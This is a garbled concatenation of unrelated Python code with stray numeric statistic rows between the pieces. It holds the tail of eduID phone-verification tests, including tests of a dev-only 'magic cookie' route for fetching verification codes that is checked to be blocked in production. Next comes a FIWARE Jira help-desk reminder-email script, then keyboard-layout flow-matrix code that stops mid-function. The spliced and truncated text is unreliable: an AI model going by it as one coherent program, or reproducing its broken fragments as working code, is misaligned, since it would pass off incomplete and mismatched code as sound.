self.assertEqual(phone_data['error'], True)
self.assertEqual(phone_data['payload']['message'], 'still-valid-code')
self.assertIsNotNone(phone_data['payload']['csrf_token'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/verify')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
self.assertEqual(u'+34609123321', verify_phone_data['payload']['phones'][2]['number'])
self.assertEqual(True, verify_phone_data['payload']['phones'][2]['verified'])
self.assertEqual(False, verify_phone_data['payload']['phones'][2]['primary'])
self.assertEqual(self.app.proofing_log.db_count(), 1)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify_fail(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/verify')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'wrong_code', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual(verify_phone_data['type'], 'POST_PHONE_VERIFY_FAIL')
self.assertEqual(verify_phone_data['payload']['message'], 'phones.code_invalid_or_expired')
self.assertEqual(self.app.proofing_log.db_count(), 0)
def test_post_phone_duplicated_number(self):
data = {'number': '0701234565'}
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164(self):
data = {'number': '+46701234565'} # e164 format
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual('+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
data = {'number': '0701234565'} # National format
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164_2(self):
data = {'number': '0701234565'} # e164 format
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual('+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
data = {'number': '+46701234565'} # National format
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_get_code_backdoor(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, code.encode('ascii'))
def test_get_code_no_backdoor_in_pro(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'pro'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured1(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = ''
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured2(self):
self.app.conf.magic_cookie = ''
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
| 42.101231 | 119 | 0.659247 | 3,772 | 30,776 | 5.113733 | 0.091198 | 0.094873 | 0.036083 | 0.04106 | 0.80647 | 0.78988 | 0.7595 | 0.743118 | 0.726632 | 0.70885 | 0 | 0.032506 | 0.221309 | 30,776 | 730 | 120 | 42.158904 | 0.772376 | 0.094717 | 0 | 0.703782 | 0 | 0 | 0.174654 | 0.069441 | 0 | 0 | 0 | 0 | 0.268908 | 1 | 0.084034 | false | 0 | 0.014706 | 0 | 0.121849 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
091784559d5189965ba0904af26f2a084e4f7562 | 23,302 | py | Python | DesksReminder/Desks/help_desk.py | flopezag/fiware-management-scripts | 3e9ccdb62a11ec0ffd0747511f5512bcdb0df729 | [
"Apache-2.0"
] | null | null | null | DesksReminder/Desks/help_desk.py | flopezag/fiware-management-scripts | 3e9ccdb62a11ec0ffd0747511f5512bcdb0df729 | [
"Apache-2.0"
] | 21 | 2017-01-17T12:19:47.000Z | 2021-06-03T07:56:56.000Z | DesksReminder/Desks/help_desk.py | flopezag/fiware-management-scripts | 3e9ccdb62a11ec0ffd0747511f5512bcdb0df729 | [
"Apache-2.0"
] | 1 | 2017-05-03T21:42:49.000Z | 2017-05-03T21:42:49.000Z | from datetime import date, datetime
from DesksReminder.Basics.dataFinder import Data
from DesksReminder.Basics.nickNames import ContactBook
from Config.settings import JIRA_URL
__author__ = 'Manuel Escriche'
class TechHelpDesk:
def __init__(self):
self.contactBook = ContactBook()
def open(self):
messages = list()
for issue in Data().getTechHelpDeskOpen():
created = datetime.strptime(issue.fields.created[:10], '%Y-%m-%d').date()
unanswered = (date.today() - created).days
if unanswered <= 1:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
# status = issue.fields.status.name
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : Open Issue'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is still OPEN, i.e. not replied for {} days.".format(issue, unanswered) +\
"\nLet me remind you of our rule to reply in the first 24 hours during working days." +\
"\nI would appreciate you spent a minute to reply to this request and to evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def inProgress(self):
messages = list()
for issue in Data().getTechHelpDeskInProgress():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : stalled Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is In Progress but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to update it by reporting its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment and evolve " \
"its status to Impeded." +\
"\nor if it was answered, please, evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def answered(self):
messages = list()
for issue in Data().getTechHelpDeskAnswered():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 4:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : Closed Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} has been Answered but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to close it" \
"\nor if the exchange continues, please, update its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment " \
"and evolve its status to Impeded." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def impeded(self):
messages = list()
for issue in Data().getTechHelpDeskImpeded():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : Impeded Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is Impeded but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to check its blocking condition persist:" \
"\nif so, please, add a comment stating it" \
"\nif not, please, get it back to In Progress, and address it" +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
class LabHelpDesk:
def __init__(self):
self.contactBook = ContactBook()
def open(self):
messages = list()
for issue in Data().getLabHelpDeskOpen():
created = datetime.strptime(issue.fields.created[:10], '%Y-%m-%d').date()
unanswered = (date.today() - created).days
if unanswered <= 1:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Lab Channel : Open Issue'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is still OPEN, i.e. not replied for {} days.".format(issue, unanswered) +\
"\nLet me remind you of our rule to reply in the first 24 hours during working days." +\
"\nI would appreciate you spent a minute to reply to this request and to evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def inProgress(self):
messages = list()
for issue in Data().getLabHelpDeskInProgress():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Lab Channel : stalled Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is In Progress but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to update it by reporting its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment " \
"and evolve its status to Impeded." +\
"\nor if it was answered, please, progress its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def answered(self):
messages = list()
for issue in Data().getLabHelpDeskAnswered():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 4:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
# status = issue.fields.status.name
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Lab Channel : Closed Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} has been Answered but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to close it" \
"\nor if the exchange continues, please, update its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment " \
"and evolve its status to Impeded." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def impeded(self):
messages = list()
for issue in Data().getLabHelpDeskImpeded():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Lab Channel : Impeded Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is Impeded but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to check its blocking condition persist:" \
"\nif so, please, add a comment stating it" \
"\nif not, please, get it back to In Progress, and address it" +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
class OthersHelpDesk:
def __init__(self):
self.contactBook = ContactBook()
self.channels = {'FIWARE-COLLABORATION-REQ': 'Collaboration',
'FIWARE-FEEDBACK': 'Feedback',
'FIWARE-GENERAL-HELP': 'General',
'FIWARE-MUNDUS-REQ': 'Mundus',
'FIWARE-OPEN-DATA-REQ': 'OpenData',
'FIWARE-OPS-HELP': 'Operations',
'FIWARE-SMART-CITIES-REQ': 'SmartCities',
'FIWARE-SPEAKERS-REQ': 'Speakers',
'FIWARE-TRAINING-REQ': 'Training'}
def open(self):
messages = list()
for issue in Data().getOthersHelpDeskOpen():
created = datetime.strptime(issue.fields.created[:10], '%Y-%m-%d').date()
unanswered = (date.today() - created).days
if unanswered <= 1:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
channel = self.channels[issue.fields.components[0].name]
# status = issue.fields.status.name
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - {} Channel : Open Issue'.format(channel)
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is still OPEN, i.e. not replied for {} days.".format(issue, unanswered) +\
"\nLet me remind you of our rule to reply in the first 24 hours during working days." +\
"\nI would appreciate you spent a minute to reply to this request and to evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def inProgress(self):
messages = list()
for issue in Data().getOthersHelpDeskInProgress():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
channel = self.channels[issue.fields.components[0].name]
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - {} Channel : stalled Issue?'.format(channel)
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is In Progress but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to update it by reporting its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment and " \
"evolve its status to Impeded." +\
"\nor if it was answered, please, evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def answered(self):
messages = list()
for issue in Data().getOthersHelpDeskAnswered():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 4:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
channel = self.channels[issue.fields.components[0].name]
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - {} Channel : Closed Issue?'.format(channel)
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} has been Answered but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to close it" \
"\nor if the exchange continues, please, update its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment " \
"and evolve its status to Impeded." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def impeded(self):
messages = list()
for issue in Data().getOthersHelpDeskImpeded():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
channel = self.channels[issue.fields.components[0].name]
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - {} Channel : Impeded Issue?'.format(channel)
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is Impeded but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to check its blocking condition persist:" \
"\nif so, please, add a comment stating it" \
"\nif not, please, get it back to In Progress, and address it" +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
if __name__ == "__main__":
pass
| 45.690196 | 114 | 0.517252 | 2,262 | 23,302 | 5.285588 | 0.083554 | 0.050602 | 0.03814 | 0.034125 | 0.935179 | 0.935179 | 0.932084 | 0.932084 | 0.932084 | 0.92899 | 0 | 0.004781 | 0.371685 | 23,302 | 509 | 115 | 45.779961 | 0.81183 | 0.004334 | 0 | 0.883777 | 0 | 0.007264 | 0.264431 | 0.002026 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03632 | false | 0.002421 | 0.009685 | 0 | 0.082324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
092d14c98b478524f0ec5b014f00592f316b2c50 | 31,929 | py | Python | code/load_flow_matrices.py | Apsu/engram | 8b9f99420c3247f00fa6ce133d664d8d126aa91a | [
"MIT"
] | 103 | 2021-01-15T08:40:13.000Z | 2022-03-27T22:39:20.000Z | code/load_flow_matrices.py | Apsu/engram | 8b9f99420c3247f00fa6ce133d664d8d126aa91a | [
"MIT"
] | 20 | 2021-04-27T05:24:24.000Z | 2022-01-11T20:22:10.000Z | code/load_flow_matrices.py | Apsu/engram | 8b9f99420c3247f00fa6ce133d664d8d126aa91a | [
"MIT"
] | 14 | 2021-04-30T04:50:25.000Z | 2022-01-07T14:51:30.000Z | # Penalizing factors for 24 keys (1 = no penalty; set to less than 1 to penalize):
# Dexterity
side_above_3away = 0.9 # index and little finger type two keys, one or more rows apart (same hand)
side_above_2away = 0.81 # index finger types key a row or two above ring finger key, or
# little finger types key a row or two above middle finger key (same hand)
side_above_1away = 0.729 # index finger types key a row or two above middle finger key, or
# little finger types key a row or two above ring finger key (same hand)
middle_above_ring = 0.9 # middle finger types key a row or two above ring finger key (same hand)
ring_above_middle = 0.729 # ring finger types key a row or two above middle finger key (same hand)
lateral = 0.9 # lateral movement of (index or little) finger outside of 8 vertical columns
# Direction
outward = 0.9 # outward roll of fingers from the index to little finger (same hand)
# Distance
skip_row_3away = 0.9 # index and little fingers type two keys that skip over home row (same hand)
# (e.g., one on bottom row, the other on top row)
skip_row_2away = 0.729 # little and middle or index and ring fingers type two keys that skip over home row (same hand)
skip_row_1away = 0.59049 # little and ring or middle and index fingers type two keys that skip over home row (same hand)
# Repetition
skip_row_0away = 0.6561 # same finger types two keys that skip over home row
same_finger = 0.59049 # use same finger again for a different key
# Unused or redundant parameters
same_hand = 1.0 # (addressed by splitting up the most frequent letters across left/right sides above)
not_home_row = 1.0 # at least one key not on home row
side_top = 1.0 # index or little finger types top corner key
shorter_above = 1.0 # (taken care of by side_above_[1,2,3]away parameters)
adjacent_offset = 1.0 # (taken care of by side_above_1away, middle_above_ring, ring_above_middle parameters)
inside_top = 1.0 # index finger types top corner key (taken care of by side_above_1away parameter)
index_above = 1.0 # index finger types top corner key (unless other bigram key is in the top row for the same hand)
# (taken care of by side_above_[1,2,3]away parameters)
def create_24x24_flow_matrix(not_home_row, side_top, side_above_3away, side_above_2away, side_above_1away,
middle_above_ring, ring_above_middle, outward, skip_row_3away,
skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral,
same_hand, shorter_above, adjacent_offset, inside_top, index_above):
all_24_keys = [1,2,3,4, 5,6,7,8, 9,10,11,12, 13,14,15,16, 17,18,19,20, 21,22,23,24]
# Create a matrix and multiply by flow factors that promote easy interkey transitions:
T = np.ones((24, 24))
# 7. Promote alternating between hands over uncomfortable transitions with the same hand.
if same_hand < 1.0:
# 1 2 3 4 13 14 15 16
# 5 6 7 8 17 18 19 20
# 9 10 11 12 21 22 23 24
for i in range(0,12):
for j in range(0,12):
T[i,j] *= same_hand
for i in range(12,24):
for j in range(12,24):
T[i,j] *= same_hand
# 8. Promote little-to-index-finger roll-ins over index-to-little-finger outwards.
# 1 2 3 4 13 14 15 16
# 5 6 7 8 17 18 19 20
# 9 10 11 12 21 22 23 24
if outward < 1.0:
# same-row roll-outs:
roll_ins = [[1,2],[2,3],[3,4], [5,6],[6,7],[7,8], [9,10],[10,11],[11,12],
[16,15],[15,14],[14,13], [20,19],[19,18],[18,17], [24,23],[23,22],[22,21]]
for x in roll_ins:
T[x[1]-1, x[0]-1] *= outward
# same-row roll-outs, skipping keys:
roll_ins_skip_keys = [[1,3],[2,4],[1,4], [5,7],[6,8],[5,8], [9,11],[10,12],[9,12],
[16,14],[15,13],[16,13], [20,18],[19,17],[20,17], [24,22],[23,21],[24,21]]
for x in roll_ins_skip_keys:
T[x[1]-1, x[0]-1] *= outward
# adjacent-row roll-outs:
roll_ins_adj_rows = [[1,6],[1,7],[1,8],[2,7],[2,8],[3,8], [5,2],[5,3],[5,4],[6,3],[6,4],[7,4],
[5,10],[5,11],[5,12],[6,11],[6,12],[7,12], [9,6],[9,7],[9,8],[10,7],[10,8],[11,8],
[16,19],[16,18],[16,17],[15,18],[15,17],[14,17], [20,15],[20,14],[20,13],[19,14],[19,13],[18,13],
[20,23],[20,22],[20,21],[19,22],[19,21],[18,21], [24,19],[24,18],[24,17],[23,18],[23,17],[22,17]]
for x in roll_ins_adj_rows:
T[x[1]-1, x[0]-1] *= outward
# upper<->lower row roll-outs:
roll_ins_skip_home = [[1,10],[1,11],[1,12],[2,11],[2,12],[3,12], [9,2],[9,3],[9,4],[10,3],[10,4],[11,4],
[16,23],[16,22],[16,21],[15,22],[15,21],[14,21], [24,15],[24,14],[24,13],[23,14],[23,13],[22,13]]
for x in roll_ins_skip_home:
T[x[1]-1, x[0]-1] *= outward
# 9. Avoid stretching shorter fingers up and longer fingers down.
# 1 2 3 4 13 14 15 16
# 5 6 7 8 17 18 19 20
# 9 10 11 12 21 22 23 24
if index_above < 1.0:
for x in [4]:
for y in [4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]:
T[x-1, y-1] *= index_above
T[y-1, x-1] *= index_above
for x in [13]:
for y in [1,2,3,4,5,6,7,8,9,10,11,12,13,17,18,19,20,21,22,23,24]:
T[x-1, y-1] *= index_above
T[y-1, x-1] *= index_above
if inside_top < 1.0:
for x in [4,13]:
for j in range(0,24):
T[x-1, j] *= inside_top
T[j, x-1] *= inside_top
if side_top < 1.0:
for x in [1,4,13,16]:
for j in range(0,24):
T[x-1, j] *= side_top
T[j, x-1] *= side_top
if side_above_1away < 1.0:
for x in [1]:
for y in [6,10]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [5]:
for y in [10]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [4]:
for y in [7,11]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [8]:
for y in [11]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [13]:
for y in [18,22]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [17]:
for y in [22]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [16]:
for y in [19,23]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [20]:
for y in [23]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
if side_above_2away < 1.0:
for x in [1]:
for y in [7,11]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [5]:
for y in [11]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
